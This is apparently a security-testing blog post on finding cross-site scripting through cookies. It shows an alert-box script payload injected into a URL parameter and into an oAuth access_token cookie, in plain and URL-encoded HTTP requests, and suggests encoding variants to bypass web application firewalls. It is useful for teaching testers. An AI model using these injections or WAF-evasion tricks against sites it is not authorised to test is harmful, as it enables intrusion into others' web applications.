Many times when we think of Cross-Site Scripting, we often forget about testing the cookies. We are usually testing the parameters in the URL Request String or POST Parameters for vulnerabilities, and spend most of our time testing something like this:

domain.com/registration/index.php?param=1337″><script>alert(httphacker)</script>


In regards to protection, cookies are the second weakest area of a web application (HTTP Headers being the first), and susceptible to numerous vulnerabilities. You can use inline cookie editing tools like the Burp Suite Proxy Intercept, a FireFox Cookie Extension, or a Chrome Cookie Extension to manipulate Cookie Values when testing a site. Here is an example of a cookie variable to manipulate when testing XSS: 

Original Request:
GET /registration/index.php HTTP/1.1
Accept: */*
Referer: domain.com/registration/
Accept-Language: en-US
User-Agent: Mozilla/4.0
Accept-Encoding: gzip, deflate
Host: domain.com
Pragma: no-cache
Connection: Keep-Alive
Cookie: oAuth[access_token]=a9s87dfaks9j;PHPSESSID=k04mk749i6cur91k;


Cross-Site Cookie Injection: (Un-encoded)
GET /registration/index.php HTTP/1.1
Accept: */*
Referer: domain.com/registration/
Accept-Language: en-US
User-Agent: Mozilla/4.0
Accept-Encoding: gzip, deflate
Host: domain.com
Pragma: no-cache
Connection: Keep-Alive
Cookie: oAuth[access_token]=1337″><script>alert(httphacker)</script>;PHPSESSID=k04mk749i6cur91k;

Cross-Site Cookie Injection: (Encoded)
GET /registration/index.php HTTP/1.1
Accept: */*
Referer: domain.com/registration/
Accept-Language: en-US
User-Agent: Mozilla/4.0
Accept-Encoding: gzip, deflate
Host: domain.com
Pragma: no-cache
Connection: Keep-Alive
Cookie: oAuth[access_token]=%31%33%33%37%22%3e%3c%73%43%72%49%70%54%3e%61%6c%65%72%74%28%68
%74%74%70%68%61%63%6b%65%72%29%3c%2f%73%43%72%49%70%54%3e;PHPSESSID=k04mk749i6cur91k;


By changing the oAuth[access_token] variable with an injection string, I am able to successfully execute a script.

xss

You should be testing different variables presented in the cookie, and not just an oAuth variable (e.g. PHPSESSID, ASPSESSIONID). It often helps to test both methods (un-encoded and encoded), as this also aids in testing Web Application Firewall Rules and can give you clues on how to bypass or evade a WAF. Just remember…the next time you’re checking XSS, don’t forget about the cookies!